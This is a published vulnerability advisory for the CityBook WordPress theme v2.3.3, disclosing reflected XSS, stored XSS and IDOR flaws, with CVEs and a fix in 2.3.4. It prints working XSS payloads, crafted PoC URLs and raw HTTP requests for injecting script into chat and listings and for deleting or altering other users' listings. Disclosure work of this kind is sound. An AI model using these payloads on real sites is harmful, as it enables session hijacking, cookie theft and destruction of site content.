CityBook < 2.3.4 - Multiple Vulnerabilities



Description
Multiple vulnerabilities was discovered in the «CityBook - Directory & Listing WordPress Theme», tested version — v2.3.3:

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- IDOR

Edit (WPScanTeam):
December 27h, 2019 - Envato Contacted
January 6th, 2020 - Envato Investigating
January 7th, 2020 - v2.3.4 released
Proof of Concept
----[]- Info: -[]----
Google Dork: /wp-content/themes/citybook/
Date: 27/12/2019
Demo website: https://citybook2.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings


----[]- Reflected XSS: -[]----
Input field with placeholder «What are you looking for?» on the homepage is vulnerable. Any payload will be triggered three times if you use "> in front of it. Same thing with a regular search (block near website logo).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E#038;location_search&#038;nearby=off&#038;address_lat&#038;address_lng&#038;distance=10&#038;lcats%5B%5D=

PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=


----[]- Persistent XSS -> Chat: -[]----
Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from chat widget on the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0

action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E

Where:
user_id=XXX (your ID; in this example account «m0ze» have ID 785);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload text).


----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: «Phone» and «Address» (will be triggered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile page for current user).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- Persistent XSS -> Listing page: -[]----
Add new listing here https://citybook2.cththemes.com/submit/ (first time you need to order a «Free» plan and go to this URL again).
Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». «Trainers» section: «Add Member» option with «Name», «Job or Position» and «Description» vulnerable input fields. «Additional Services Fees» section: «Add Service» option with «Service Name» vulnerable input field. «Listing Address» payload also works on the admin dashboard, so it's possible to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

7610
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>

-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"


-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"


-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"

<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"


-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"


-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"

<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"

<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"

<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"

<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

82b818f99a
-----------------------------18467633426500--


----[]- IDOR #0: -[]----
Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
Pragma: no-cache
Cache-Control: no-cache

lid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).


----[]- IDOR #1: -[]----
Remove the «Featured» option for any listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779

lid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where:
lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).

Affects Theme

fixed in version 2.3.4

References

CVE 2019-20210
CVE 2019-20211
CVE 2019-20212
CVE 2019-20209
URL https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Views 131224
Verified Yes
WPVDB ID 10013

Timeline

Publicly Published 2020-01-09 (5 months ago)
Added 2020-01-09 (5 months ago)
Last Updated 2020-01-14 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin